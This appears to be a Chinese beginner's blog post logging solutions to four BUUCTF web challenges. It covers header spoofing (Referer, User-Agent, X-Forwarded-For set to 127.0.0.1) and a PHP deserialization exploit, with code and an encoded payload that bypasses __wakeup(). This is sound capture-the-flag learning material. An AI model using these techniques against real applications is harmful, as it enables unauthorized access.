新手入门Web安全学习Week7
1.[極客大挑戰 2019]Knife
這個怕是簽到題?
真·白給
?
根目錄找到flag
2.[極客大挑戰 2019]Http
http類的題目,直接打開burp 看見有個secret
需要修改頭
Referer:https://www.Sycsecret.buuoj.cn?提示瀏覽器需要使用Syclover,向頭里面添加一行,也就是修改一下User-Agent的內容
又說只能在本地訪問,那么意思就是要我們使用127.0.0.1來訪問
?那就
X-Forwarded-For:127.0.0.1就來咯
3.[RoarCTF 2019]Easy Calc
看源碼有點東東?
先掃根目錄 發現f1agg
拿來把你
?
4.[極客大挑戰 2019]PHP
開局一只貓然后看見一個重點 備份網站 用dirsearch掃一下
硬掃了七分鐘出來個紫東東
下載來康康
點開flag.php里面想交 結果肯定不那么簡單 果然就錯了
再分析index.php
里面加載了一個class.php文件,然后采用get傳遞一個select參數,隨后將之反序列化
再看class.php
讀代碼發現password=100,username=admin,在執行__destruct()的時候可以獲得flag
但是wakeup方法會導致username成為guest,因此需要通過序列化字符串中對象的個數來繞過該方法
上代碼
<?php class Name {private $username = 'admin';private $password = '100'; } $a = new Name(); #進行url編碼,防止%00對應的不可打印字符在復制時丟失 echo urlencode(serialize($a)); #未編碼的情況 //O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";} //使用時將URL編碼的結果中Name后面的2換成3或其他值 ?>結果:
I have a cat!http://56881b4c-bd6e-4b5c-96a1-bc40b628f7bc.node4.buuoj.cn:81/index.php?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
?
?博客就這樣了 想給贊就給吧 不給也行?
總結
以上是生活随笔為你收集整理的新手入门Web安全学习Week7的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Web安全学习week6
- 下一篇: hashmap(1.8)